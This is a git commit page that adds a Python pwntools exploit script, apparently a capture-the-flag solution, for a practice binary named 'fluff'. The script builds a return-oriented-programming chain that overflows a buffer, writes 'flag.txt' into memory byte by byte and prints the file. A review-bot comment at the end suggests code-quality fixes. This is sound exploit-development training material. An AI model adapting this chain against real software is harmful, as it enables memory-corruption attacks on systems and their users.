author | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-17 19:39:54 -0600 |
---|---|---|
committer | Brett Weiland <brett_weiland@bpcspace.com> | 2020-12-17 19:39:54 -0600 |
commit | 4c25bd918847e914875e900285008eb3865ca8b6 (patch) | |
tree | 548243b13c540d051c4a47e6ad7021e50eb021ae /x86_64/fluff/exploit.py | |
parent | 3f54969f581fd311c09b1c21758ad9aa4a8784f4 (diff) |
new file: x86_64/fluff/exploit.py
new file: x86_64/fluff/gadgets
Diffstat (limited to 'x86_64/fluff/exploit.py')
-rwxr-xr-x | x86_64/fluff/exploit.py | 49 |
1 files changed, 49 insertions, 0 deletions
diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py
new file mode 100755
index 0000000..cdf5de8
--- /dev/null
+++ b/x86_64/fluff/exploit.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
|
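Review bot: The flag-path buffer address appears twice in the new script under two spellings — `0x0000000000600df0 + 0x00000df0` in the `write_str` call and the literal `0x601be0` on the `# set rdi` line two lines later; both evaluate to 0x601be0, but nothing ties them together, so a single `FLAG_BUF = 0x601be0` used in both places would prevent a silent mismatch if one is edited. The other raw addresses (0x4006a3, 0x40062a, 0x400610, 0x400628, 0x400639, 0x400510) carry no names even though the commit also adds a `gadgets` file; a short comment per address naming the gadget it points at, as `# set rdi` already does, would make the chain reviewable without re-disassembling the binary. `write_str` raises a bare `KeyError` for any character absent from the seven-entry `letter_lookups`; a guard such as `if c not in letter_lookups: raise ValueError(f"no gadget for {c!r}")` fails with a message that names the problem. `str(prog.recv(), 'UTF-8')` raises `UnicodeDecodeError` if the target emits non-UTF-8 bytes, which an exploit run easily can, so `prog.recv().decode('utf-8', errors='replace')` avoids aborting before `interactive()`. Indentation is not recoverable from this rendering, so whether the `0x400610`/`0x400628`/`0x400639` lines sit inside the `for c in string:` loop cannot be confirmed here.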